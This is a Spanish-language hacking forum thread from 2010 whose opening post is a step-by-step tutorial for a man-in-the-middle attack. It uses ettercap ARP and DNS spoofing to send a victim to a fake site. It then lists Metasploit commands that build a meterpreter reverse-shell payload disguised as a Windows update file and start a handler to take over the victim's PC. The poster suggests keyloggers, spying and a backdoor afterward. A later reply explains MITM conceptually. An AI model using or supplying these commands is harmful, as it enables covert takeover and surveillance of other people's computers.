Man In The Middle (MITM) Attack : ettercap, metasploit

gfxgfx
 
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?

Ingresar con nombre de usuario, contraseña y duración de la sesión
 
gfx gfx
gfx
21208 Mensajes en 4872 Temas por 20735 Usuarios - Último usuario: EL mejor vago Mayo 23, 2012, 00:44:40
*
gfx*InicioAyudarssBuscarCalendarioIngresarRegistrarsegfx
gfxgfx
0 Usuarios y 1 Visitante están viendo este tema.       « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Man In The Middle (MITM) Attack : ettercap, metasploit  (Leído 2807 veces)
Neo_2010
User Nuevo
*
Desconectado Desconectado

Mensajes: 6


Ver Perfil
Man In The Middle (MITM) Attack : ettercap, metasploit
« en: Febrero 28, 2010, 21:50:23 »

Man In The Middle (MITM) Attack : ettercap, metasploit
¿Qué es esto?
Con la creación de un sitio Web falso, que con un poco de ingeñieria social obtendriamos el acceso a la línea de comandos para PC nuestro objetivo.

¿Cómo funciona esto?
> Ettercap para realizar el ataque MITM
> Metasploit para la explotación
> Apache para el servidor web

¿Qué necesito?
> Ettercap
> Metasploit
> Servidor Web

Aca va un video:
Attack: Man In The Middle (MITM) | g0tmi1k
Para descargar:
http://www.mediafire.com/?x5xt4nkgjtn
Aca los comandos del video pero mejorado por mi Smiley
Citar
#Exploit Reverse Tcp
nano /usr/share/ettercap/etter.dns

sh -c "start-apache"
y si no te funciona tenes
/etc/init.d/apache2 start

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=IP (Internet Protocol) X > /var/www/Windows-KB174529-x86-ENU.exe
,/msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP (Internet Protocol) -ifconfig-
exploit
ettercap -T -Q -P dns_spoof -M arp // // -i eth0
shell
Y ahi después hacen lo que se les cante Cheesy
keylloger,espia,screenshot y etc....


Fuente: http://forums.remote-exploit.org

PD: Es mi primer tutorial asi que cualquiera error es por ser la primera vez xD, también se puede meter SBD (Secure BackDoor) pero eso ya depende de cada uno Cheesy
Salu2
En línea
phant0n
Visitante


Email
Re: Man In The Middle (MITM) Attack : ettercap, metasploit
« Respuesta #1 en: Febrero 28, 2010, 23:57:04 »

El hombre en el plan de ataque intercepta una comunicación entre dos sistemas. Por ejemplo, en una transacción HTTP, el objetivo es la conexión TCP entre el cliente y el servidor. Uso de diferentes técnicas, el atacante se divide la conexión TCP original en 2 nuevas conexiones, uno entre el cliente y el atacante y el otro entre el atacante y el servidor, como se muestra en la figura
 1. Una vez que se intercepta la conexión TCP, el atacante actúa como un proxy, ser capaz de leer, insertar y modificar los datos en la comunicación interceptada.



Figura 1. Ilustración de "man-in-the-middle

El ataque MITM es muy eficaz debido a la naturaleza del protocolo HTTP y la transferencia de datos que están basado en ASCII. De esta manera, es posible ver y entrevista en el protocolo HTTP y también en los datos transferidos. Así, por ejemplo, es posible capturar una cookie de sesión de lectura de la cabecera HTTP, pero también es posible cambiar la cantidad de transacciones monetarias dentro del contexto de aplicación, como se muestra en la figura 2.



Figura 2. Ilustración de un paquete HTTP interceptado con Paros Proxy.

El ataque MITM También podría hacerse a través de una conexión HTTPS utilizando la misma técnica, la única diferencia consiste en el establecimiento de dos sesiones SSL independientes, uno por cada conexión TCP. El navegador establece una conexión SSL con el atacante y el atacante establece otra conexión SSL con el servidor web. En general, el navegador avisa al usuario que el certificado digital que se utiliza no es válido, pero el usuario puede ignorar la advertencia, porque no entiende la amenaza. En algunos contextos específicos, es posible que la advertencia no aparece, como por ejemplo, cuando el certificado de servidor se vea comprometido por el atacante, o cuando el atacante certificado está firmado por una CA de confianza y de la NC es el mismo del sitio web original.

MITM no es sólo una técnica de ataque, pero también se utiliza generalmente durante la etapa de desarrollo de una aplicación web o todavía se usa para las evaluaciones de la vulnerabilidad de Internet.
MITM herramientas de ataque

Hay varias herramientas para realizar un ataque MITM. Estas herramientas son especialmente eficientes en entornos de red LAN, ya que poner en práctica funcionalidades extra, como la capacidad de spoof arp que permitan la interceptación de las comunicaciones entre los hosts.
PacketCreator
Ettercap
Dsniff
Caín y Abel
MITM Proxy sólo herramientas

Herramientas de proxy sólo permiten interactiion con las partes del protocolo HTTP, como el encabezado y el cuerpo de una transacción, pero no tienen la capacidad para interceptar la conexión TCP entre el cliente y el servidor. Para interceptar la comunicación, es necesario utilizar otras herramientas de ataque de red o configurar el navegador.



Ya sabia que habia visto  lo estaba confundiendo lo explique en un foro el cual no recuerdo bien  intern00t creo que fue  salu2 mijos solo es info adicional Cheesy
« Última modificación: Marzo 01, 2010, 00:12:05 por phant0n » En línea
Cyber_Ghost
User Nuevo
*
Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Man In The Middle (MITM) Attack : ettercap, metasploit
« Respuesta #2 en: Septiembre 30, 2011, 20:37:16 »

Muy buen aporte, explicado bastante laro y didacticamnete Cheesy great job ._.
En línea
gfx
Páginas: [1] Ir Arriba Imprimir 
gfx
Ir a:  
gfx
Powered by SMF 1.1.16 | SMF © 2006, Simple Machines
HDL Group hackers

gfx